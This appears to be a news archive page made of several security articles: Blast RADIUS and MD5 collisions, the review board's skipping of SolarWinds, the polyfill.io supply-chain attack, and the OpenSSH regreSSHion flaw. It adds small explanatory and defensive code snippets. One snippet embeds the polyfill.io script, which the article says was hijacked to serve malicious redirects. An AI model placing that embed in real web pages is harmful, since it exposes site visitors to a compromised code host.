The protocol was developed in 1991 by a company known as Livingston Enterprises. In 1997 the Internet Engineering Task Force made it an official standard, which was updated three years later. Although there is a draft proposal for sending RADIUS traffic inside of a TLS-encrypted session that’s supported by some vendors, many devices using the protocol only send packets in clear text through UDP (User Datagram Protocol).

A more detailed illustration of RADIUS using Password Authentication Protocol over UDP. Credit: Goldberg et al.

Roll-your-own authentication with MD5? For real?

Since 1994, RADIUS has relied on an improvised, home-grown use of the MD5 hash function. First created in 1991 and adopted by the IETF in 1992, MD5 was at the time a popular hash function for creating what are known as “message digests” that map an arbitrary input like a number, text, or binary file to a fixed-length 16-byte output.
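RADIUS leans on that digest directly: per RFC 2865, a server proves a response is genuine by MD5-hashing the response packet fields together with the shared secret. A minimal Node.js sketch of that construction follows, with dummy values standing in for real packet contents:

const crypto = require('crypto');

// Response Authenticator per RFC 2865:
// MD5(Code + ID + Length + RequestAuthenticator + Attributes + Secret)
function responseAuthenticator(code, id, length, requestAuth, attributes, secret) {
    const header = Buffer.alloc(4);
    header.writeUInt8(code, 0);       // e.g., 2 = Access-Accept, 3 = Access-Reject
    header.writeUInt8(id, 1);         // copied from the matching request
    header.writeUInt16BE(length, 2);  // total packet length
    return crypto.createHash('md5')
        .update(Buffer.concat([header, requestAuth, attributes, Buffer.from(secret)]))
        .digest();
}

// Dummy inputs purely for illustration.
const auth = responseAuthenticator(2, 1, 20, Buffer.alloc(16), Buffer.alloc(0), 'shared-secret');
console.log(auth.toString('hex'));
// This 16-byte MD5 digest is the protocol's only integrity check, which is
// why a practical collision against MD5 translates into forgeable responses.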

For a cryptographic hash function, it should be computationally impossible for an attacker to find two inputs that map to the same output. Unfortunately, MD5 proved to be based on a weak design: Within a few years, there were signs that the function might be more susceptible than originally thought to attacker-induced collisions, a fatal flaw that allows the attacker to generate two distinct inputs that produce identical outputs. These suspicions were formally verified in a paper published in 2004 by researchers Xiaoyun Wang and Hongbo Yu and further refined in a research paper published three years later.

The latter paper—published in 2007 by researchers Marc Stevens, Arjen Lenstra, and Benne de Weger—described what’s known as a chosen-prefix collision, a type of collision that results from two messages chosen by an attacker that, when combined with two additional messages, create the same hash. That is, the adversary freely chooses two distinct input prefixes 𝑃 and 𝑃′ of arbitrary content that, when combined with carefully corresponding suffixes 𝑆 and 𝑆′ that resemble random gibberish, generate the same hash. In mathematical notation, such a chosen-prefix collision would be written as 𝐻(𝑃‖𝑆)=𝐻(𝑃′‖𝑆′). This type of collision attack is much more powerful because it allows the attacker the freedom to create highly customized forgeries.

To illustrate the practicality and devastating consequences of the attack, Stevens, Lenstra, and de Weger used it to create two cryptographic X.509 certificates that generated the same MD5 signature but different public keys and different Distinguished Name fields. Such a collision could induce a certificate authority intending to sign a certificate for one domain to unknowingly sign a certificate for an entirely different, malicious domain.

In 2008, a team of researchers that included Stevens, Lenstra, and de Weger demonstrated how a chosen-prefix attack on MD5 allowed them to create a rogue certificate authority that could generate TLS certificates that would be trusted by all major browsers. A key ingredient for the attack is software named hashclash, developed by the researchers. Hashclash has since been made publicly available.

Despite the undisputed demise of MD5, the function remained in widespread use for years. Deprecation of MD5 didn’t start in earnest until 2012 after malware known as Flame, reportedly created jointly by the governments of Israel and the US, was found to have used a chosen-prefix attack to spoof MD5-based code signing by Microsoft’s Windows update mechanism. Flame used the collision-enabled spoofing to hijack the update mechanism so the malware could spread from device to device inside an infected network.

More than 12 years after Flame’s devastating damage was discovered and two decades after collision susceptibility was confirmed, MD5 has felled yet another widely deployed technology that has resisted common wisdom to move away from the hashing scheme—the RADIUS protocol, which is supported in hardware or software provided by at least 86 distinct vendors. The result is “Blast RADIUS,” a complex attack that allows an attacker with an active adversary-in-the-middle position to gain administrator access to devices that use RADIUS to authenticate themselves to a server.

“Surprisingly, in the two decades since Wang et al. demonstrated an MD5 hash collision in 2004, RADIUS has not been updated to remove MD5,” the research team behind Blast RADIUS wrote in a paper published Tuesday and titled RADIUS/UDP Considered Harmful. “In fact, RADIUS appears to have received notably little security analysis given its ubiquity in modern networks.”

The paper’s publication is being coordinated with security bulletins from at least 90 vendors whose wares are vulnerable. Many of the bulletins are accompanied by patches implementing short-term fixes, while a working group of engineers across the industry drafts longer-term solutions. Anyone who uses hardware or software that incorporates RADIUS should read the technical details provided later in this post and check with the manufacturer for security guidance.

The president ordered a board to probe a massive Russian cyberattack. It never did.

This story was originally published by ProPublica.

After Russian intelligence launched one of the most devastating cyber espionage attacks in history against US government agencies, the Biden administration set up a new board and tasked it to figure out what happened—and tell the public.

State hackers had infiltrated SolarWinds, an American software company that serves the US government and thousands of American companies. The intruders used malicious code and a flaw in a Microsoft product to steal intelligence from the National Nuclear Security Administration, National Institutes of Health, and the Treasury Department in what Microsoft President Brad Smith called “the largest and most sophisticated attack the world has ever seen.”

The president issued an executive order establishing the Cyber Safety Review Board in May 2021 and ordered it to start work by reviewing the SolarWinds attack.

But for reasons that experts say remain unclear, that never happened.

Nor did the board probe SolarWinds for its second report.

For its third, the board investigated a separate 2023 attack, in which Chinese state hackers exploited an array of Microsoft security shortcomings to access the email inboxes of top federal officials.

A full, public accounting of what happened in the SolarWinds case would have been devastating to Microsoft. ProPublica recently revealed that Microsoft had long known about—but refused to address—a flaw used in the hack. The tech company’s failure to act reflected a corporate culture that prioritized profit over security and left the US government vulnerable, a whistleblower said.

The board was created to help address the serious threat posed to the US economy and national security by sophisticated hackers who consistently penetrate government and corporate systems, making off with reams of sensitive intelligence, corporate secrets, or personal data.

For decades, the cybersecurity community has called for a cyber equivalent of the National Transportation Safety Board, the independent agency required by law to investigate and issue public reports on the causes and lessons learned from every major aviation accident, among other incidents. The NTSB is funded by Congress and staffed by experts who work outside of the industry and other government agencies. Its public hearings and reports spur industry change and action by regulators like the Federal Aviation Administration.

So far, the Cyber Safety Review Board has charted a different path.

The board is not independent—it’s housed in the Department of Homeland Security. Rob Silvers, the board chair, is a Homeland Security undersecretary. Its vice chair is a top security executive at Google. The board does not have full-time staff, subpoena power or dedicated funding.

Silvers told ProPublica that DHS decided the board didn’t need to do its own review of SolarWinds as directed by the White House because the attack had already been “closely studied” by the public and private sectors.

“We want to focus the board on reviews where there is a lot of insight left to be gleaned, a lot of lessons learned that can be drawn out through investigation,” he said.

As a result, there has been no public examination by the government of the unaddressed security issue at Microsoft that was exploited by the Russian hackers. None of the SolarWinds reports identified or interviewed the whistleblower who exposed problems inside Microsoft.

By declining to review SolarWinds, the board failed to discover the central role that Microsoft’s weak security culture played in the attack and to spur changes that could have mitigated or prevented the 2023 Chinese hack, cybersecurity experts and elected officials told ProPublica.

“It’s possible the most recent hack could have been prevented by real oversight,” Sen. Ron Wyden, a Democratic member of the Senate Select Committee on Intelligence, said in a statement. Wyden has called for the board to review SolarWinds and for the government to improve its cybersecurity defenses.

In a statement, a spokesperson for DHS rejected the idea that a SolarWinds review could have exposed Microsoft’s failings in time to stop or mitigate the Chinese state-based attack last summer. “The two incidents were quite different in that regard, and we do not believe a review of SolarWinds would have necessarily uncovered the gaps identified in the Board’s latest report,” they said.

The board’s other members declined to comment, referred inquiries to DHS or did not respond to ProPublica.

In past statements, Microsoft did not dispute the whistleblower’s account but emphasized its commitment to security. “Protecting customers is always our highest priority,” a spokesperson previously told ProPublica. “Our security response team takes all security issues seriously and gives every case due diligence with a thorough manual assessment, as well as cross-confirming with engineering and security partners.”

The board’s failure to probe SolarWinds also underscores a question critics including Wyden have raised about the board since its inception: whether a board with federal officials making up its majority can hold government agencies responsible for their role in failing to prevent cyberattacks.

“I remain deeply concerned that a key reason why the Board never looked at SolarWinds—as the President directed it to do so—was because it would have required the board to examine and document serious negligence by the US government,” Wyden said. Among his concerns is a government cyberdefense system that failed to detect the SolarWinds attack.

Silvers said that while the board did not investigate SolarWinds, it was given a pass by the independent Government Accountability Office, which said in an April study examining the implementation of the executive order that the board had fulfilled its mandate to conduct the review.

The GAO’s determination puzzled cybersecurity experts. “Rob Silvers has been declaring by fiat for a long time that the CSRB did its job regarding SolarWinds, but simply declaring something to be so doesn’t make it true,” said Tarah Wheeler, the CEO of Red Queen Dynamics, a cybersecurity firm, who co-authored a Harvard Kennedy School report outlining how a “cyber NTSB” should operate.

Silvers said the board’s first and second reports, while not probing SolarWinds, resulted in important government changes, such as new Federal Communications Commission rules related to cell phones.

“The tangible impacts of the board’s work to date speak for itself and in bearing out the wisdom of the choices of what the board has reviewed,” he said.

384,000 sites pull code from sketchy code library recently bought by Chinese firm

The supply-chain threat that won’t die —

Many website admins, it seems, have yet to get the memo to remove Polyfill[.]io links.

More than 384,000 websites are linking to a site that was caught last week performing a supply-chain attack that redirected visitors to malicious sites, researchers said.

For years, the JavaScript code, hosted at polyfill[.]io, was a legitimate open source project that allowed older browsers to handle advanced functions that weren’t natively supported. By linking to cdn.polyfill[.]io, websites could ensure that devices using legacy browsers could render content in newer formats. The free service was popular among websites because all they had to do was embed the link in their sites. The code hosted on the polyfill site did the rest.
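Embedding the service took a single tag, which is why the dependency spread so widely. The snippet below shows the typical form of the legacy embed (the v3 URL is the one the project documented; treat it as illustrative):

<!-- Typical legacy embed; sites should delete it or point src at a trusted mirror. -->
<script src="https://cdn.polyfill.io/v3/polyfill.min.js"></script>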

The power of supply-chain attacks

In February, China-based company Funnull acquired the domain and the GitHub account that hosted the JavaScript code. On June 25, researchers from security firm Sansec reported that code hosted on the polyfill domain had been changed to redirect users to adult- and gambling-themed websites. The code was deliberately designed to mask the redirections by performing them only at certain times of the day and only against visitors who met specific criteria.

The revelation prompted industry-wide calls to take action. Two days after the Sansec report was published, domain registrar Namecheap suspended the domain, a move that effectively prevented the malicious code from running on visitor devices. Even before then, content delivery networks such as Cloudflare began automatically replacing polyfill links with domains leading to safe mirror sites. Google blocked ads for sites embedding the Polyfill[.]io domain. The website blocker uBlock Origin added the domain to its filter list. And Andrew Betts, the original creator of Polyfill.io, urged website owners to remove links to the library immediately.

As of Tuesday, exactly one week after the malicious behavior came to light, 384,773 sites continued to link to the site, according to researchers from security firm Censys. Some of the sites were associated with mainstream companies including Hulu, Mercedes-Benz, and Warner Bros., as well as the federal government. The findings underscore the power of supply-chain attacks, which can spread malware to thousands or millions of people simply by infecting a common source they all rely on.

“Since the domain was suspended, the supply-chain attack has been halted,” Aidan Holland, a member of the Censys Research Team, wrote in an email. “However, if the domain was to be un-suspended or transferred, it could resume its malicious behavior. My hope is that NameCheap properly locked down the domain and would prevent this from occurring.”

What’s more, the Internet scan performed by Censys found more than 1.6 million sites linking to one or more domains that were registered by the same entity that owns polyfill[.]io. At least one of the sites, bootcss[.]com, was observed in June 2023 performing malicious actions similar to those of polyfill. That domain, and three others—bootcdn[.]net, staticfile[.]net, and staticfile[.]org—were also found to have leaked a user’s authentication key for accessing a programming interface provided by Cloudflare.

Censys researchers wrote:

So far, this domain (bootcss.com) is the only one showing any signs of potential malice. The nature of the other associated endpoints remains unknown, and we avoid speculation. However, it wouldn’t be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future.

Of the 384,773 sites still linking to polyfill[.]io, 237,700, or almost 62 percent, were hosted by Germany-based web host Hetzner.

Censys found that various mainstream sites—both in the public and private sectors—were among those linking to polyfill. They included:

  • Warner Bros. (www.warnerbros.com)
  • Hulu (www.hulu.com)
  • Mercedes-Benz (shop.mercedes-benz.com)
  • Pearson (digital-library-qa.pearson.com, digital-library-stg.pearson.com)
  • ns-static-assets.s3.amazonaws.com

The amazonaws.com address was the most common domain associated with sites still linking to the polyfill site, an indication of widespread usage among users of Amazon’s S3 static website hosting.

Censys also found 182 domains ending in .gov, meaning they are affiliated with a government entity. One such domain—feedthefuture[.]gov—is affiliated with the US federal government. A breakdown of the top 50 affected sites is here.

Attempts to reach Funnull representatives for comment weren’t successful.

384,000 sites pull code from sketchy code library recently bought by Chinese firm Read More »

“regresshion”-vulnerability-in-openssh-gives-attackers-root-on-linux

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux

RELAPSE —

Full system compromise possible by peppering servers with thousands of connection requests.

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux

Researchers have warned of a critical vulnerability affecting the OpenSSH networking utility that can be exploited to give attackers complete control of Linux and Unix servers with no authentication required.

The vulnerability, tracked as CVE-2024-6387, allows unauthenticated remote code execution with root system rights on Linux systems that are based on glibc, an open source implementation of the C standard library. The vulnerability is the result of a code regression introduced in 2020 that reintroduced CVE-2006-5051, a vulnerability that was fixed in 2006. With thousands, if not millions, of vulnerable servers populating the Internet, this latest vulnerability could pose a significant risk.

Complete system takeover

“This vulnerability, if exploited, could lead to full system compromise where an attacker can execute arbitrary code with the highest privileges, resulting in a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access,” wrote Bharat Jogi, the senior director of threat research at Qualys, the security firm that discovered it. “It could facilitate network propagation, allowing attackers to use a compromised system as a foothold to traverse and exploit other vulnerable systems within the organization.”

The risk is in part driven by the central role OpenSSH plays in virtually every internal network connected to the Internet. It provides a channel for administrators to connect to protected devices remotely or from one device to another inside the network. OpenSSH’s support for multiple strong encryption protocols, its integration into virtually all modern operating systems, and its location at the very perimeter of networks further drive its popularity.

Besides the ubiquity of vulnerable servers populating the Internet, CVE-2024-6387 also provides a potent means for executing malicious code with the highest privileges, with no authentication required. When a client device initiates a connection but doesn’t successfully authenticate itself within an allotted time (120 seconds by default), vulnerable OpenSSH systems call what’s known as a SIGALRM handler asynchronously. The flaw stems from faulty management of that handler, which interrupts whatever the server is doing at that instant and reaches glibc functions that aren’t safe to call from that context. The flaw resides in sshd, the main OpenSSH engine. Qualys has named the vulnerability regreSSHion.
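The hazard class is easier to see in miniature. The sketch below (Unix-only Python) only gestures at the bug, since Python delivers signals between interpreter bytecodes while sshd’s handler runs truly asynchronously in C, but it shows the pattern: a timer handler mutating state that the interrupted code is midway through using.

```python
"""Miniature of the hazard class behind regreSSHion: a timer signal whose
handler mutates state the interrupted code is midway through using.
Unix-only, and schematic -- the real race is in C inside sshd.
"""
import signal

pending = {"client": "unauthenticated"}

def grace_timeout(signum, frame):
    # Fires asynchronously when the timer expires, regardless of what the
    # main flow is doing (cf. sshd's SIGALRM handler after LoginGraceTime).
    pending.clear()

signal.signal(signal.SIGALRM, grace_timeout)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0.01)  # fire every 10 ms

for attempt in range(10_000_000):
    pending["client"] = attempt      # main flow writes...
    if "client" not in pending:      # ...and reads; the handler can land between
        print(f"handler interleaved with the update at attempt {attempt}")
        break

signal.setitimer(signal.ITIMER_REAL, 0, 0)  # cancel the timer
```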

The severity of the threat posed by exploitation is significant, but various factors are likely to prevent it from being mass exploited, security experts said. For one, the attack can take as long as eight hours to complete and require as many as 10,000 authentication steps, Stan Kaminsky, a researcher at security firm Kaspersky, said. The delay results from a defense known as address space layout randomization, which changes the memory addresses where executable code is stored to thwart attempts to run malicious payloads.

Other limitations apply. Attackers must also know the specific OS running on each targeted server. So far, no one has found a way to exploit 64-bit systems, since the number of available memory addresses is exponentially higher than on 32-bit systems. Further lowering the chances of success, defenses against denial-of-service attacks, which cap the number of connection requests coming into a vulnerable system, will cause exploitation attempts to fail.

All of those limitations will likely prevent CVE-2024-6387 from being mass exploited, researchers said, but there’s still the risk of targeted attacks that pepper a specific network of interest with authentication attempts over a matter of days until code execution is achieved. To cover their tracks, attackers could spread requests across a large number of IP addresses in a fashion similar to password-spraying attacks. In this way, attackers could target a handful of vulnerable networks until one or more of the attempts succeeded.

The vulnerability affects the following:

  • OpenSSH versions earlier than 4.4p1 are vulnerable to this signal handler race condition unless they are patched for CVE-2006-5051 and CVE-2008-4109.
  • Versions from 4.4p1 up to, but not including, 8.5p1 are not vulnerable due to a transformative patch for CVE-2006-5051, which made a previously unsafe function secure.
  • The vulnerability resurfaces in versions from 8.5p1 up to, but not including, 9.8p1 due to the accidental removal of a critical component in a function.

Anyone running a vulnerable version should update as soon as practicable.
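As a rough triage step, a server’s advertised version banner can be compared against those ranges. The Python sketch below assumes the server sends a standard OpenSSH identification string; note that distributions often backport fixes without bumping the version, so a vulnerable-looking banner is a prompt to check vendor advisories rather than proof of exposure.

```python
"""Rough triage of CVE-2024-6387 exposure from an OpenSSH version banner.

Sketch only: distros often backport fixes without changing the banner,
so "possibly vulnerable" means "go read your vendor's advisory."
"""
import re
import socket
import sys

def banner_version(host: str, port: int = 22):
    # SSH servers send an identification string such as
    # "SSH-2.0-OpenSSH_9.6p1" as soon as a client connects.
    with socket.create_connection((host, port), timeout=5) as sock:
        banner = sock.recv(256).decode("ascii", errors="replace")
    match = re.search(r"OpenSSH_(\d+)\.(\d+)", banner)
    return (int(match.group(1)), int(match.group(2))) if match else None

def maybe_vulnerable(version) -> bool:
    # Per the ranges above: < 4.4 vulnerable (absent the 2006 patch),
    # 4.4 up to 8.5 safe, 8.5 up to (but not including) 9.8 vulnerable.
    return version < (4, 4) or (8, 5) <= version < (9, 8)

if __name__ == "__main__":
    host = sys.argv[1]
    version = banner_version(host)
    if version is None:
        print(f"{host}: no parsable OpenSSH banner")
    else:
        verdict = "possibly vulnerable" if maybe_vulnerable(version) else "outside the affected ranges"
        print(f"{host}: OpenSSH {version[0]}.{version[1]} -- {verdict}")
```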

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux Read More »